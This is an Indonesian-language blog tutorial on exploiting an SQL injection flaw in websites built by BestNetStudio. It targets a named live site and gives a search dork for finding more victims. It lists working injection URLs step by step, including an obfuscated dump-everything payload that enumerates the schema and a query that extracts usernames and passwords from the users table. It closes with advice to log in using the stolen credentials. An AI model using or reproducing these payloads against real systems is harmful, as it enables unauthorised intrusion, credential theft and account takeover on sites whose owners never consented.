BestNetStudio - Sql Injection Vulnerability

Dork

  • "Developed by BestNetStudio"
  • ( kembangin lagi bos )

Dios

Di sini saya menggunakan live target, Jadi langsung ke intinya saja

Step 1

Lakukan pengecekan terhadap web yang ingin kita tusbol, Dengan cara memasukan tanda ( ' ) di belakang parameter web tersebut

https://edinstvenamakedonija.mk/description.php?id=2841%27


Jika web tersebut vuln, Web akan mengalami eror, Setelah itu kita masukan query +order+by+1--+-

Jika web nya balik normal lagi, Kita tambahkan angka nya sampe web nya eror lagi

Example

https://edinstvenamakedonija.mk/description.php?id=2841%27+order+by+1--+- ( normal )
https://edinstvenamakedonija.mk/description.php?id=2841%27+order+by+2--+- ( normal )
https://edinstvenamakedonija.mk/description.php?id=2841%27+order+by+3--+- ( normal )
https://edinstvenamakedonija.mk/description.php?id=2841%27+order+by+18--+- ( eror )


Step 2

Lakukan select / injeksi pada web tersebut

Di atas kita sudah mengetahui bahwa web tersebut eror di angka 18 yang artinya kita melakukan injeksi di nomor 17

https://edinstvenamakedonija.mk/description.php?id=2841%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--+- ( normal )

Loh kok angka ajaibnya nya ga keluar bang, Tenang kita hanya tinggal menambahkan ( - ) di depan parameter

https://edinstvenamakedonija.mk/description.php?id=-2841%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--+- ( Ok )


Step 3

Lakukan pencarian tabel user / admin pada database web tersebut

https://edinstvenamakedonija.mk/description.php?id=-2841%27%20union%20select%201,2,3,4,(togel),(togel),7,8,9,10,11,12,13,14,15,16,17--+-

Masukan dios kita di angka togel yang muncul di web tersebut

https://edinstvenamakedonija.mk/description.php?id=-2841%27%20union%20select%201,2,3,4,ConcAt/**_**/(0x3c63656e7465723e,0x3c696d67207372633d2268747470733a2f2f706173746562696e2e636f6d2f63616368652f696d672f372f392f32352f323437383031332e6a7067222077696474683d2231353022206865696768743d22313530223e,0x3c62723e,0x20496e6a6563746564204279203078436f7233,0x3c62723e,0x204442203a20,database/**_**/(),0x207c20,0x566572203a20,version/**_**/(),0x207c20,0x55736572203a20,user/**_**/(),(select(@x)/*!50000from*/(select(@x:=0x00),(select(0)/*!50000from*/(/*!50000information_schema*/.columns)where(table_schema=database/**_**/())and(0x00)in(@x:=concat+(@x,0x3c62723e,/*!50000table_name*/,0x203e20,/*!50000column_name*/))))x)),6,7,8,9,10,11,12,13,14,15,16,17--+-


Lalu Kita scrol ke bawah dan cari tabel user / adminnya

Step 4

Jika sudah menemukan tabel user / admin kita lakukan dump pada tabel tersebut

  • users > username
  • users > password
https://edinstvenamakedonija.mk/description.php?id=-2841%27%20union%20select%201,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17 from users--+-


Maka akan muncul username + passswd dari web tersebut, Jika sudah kita tinggal login di web tersebut

Sekian tutorial dari saya

Posting Komentar

0 Komentar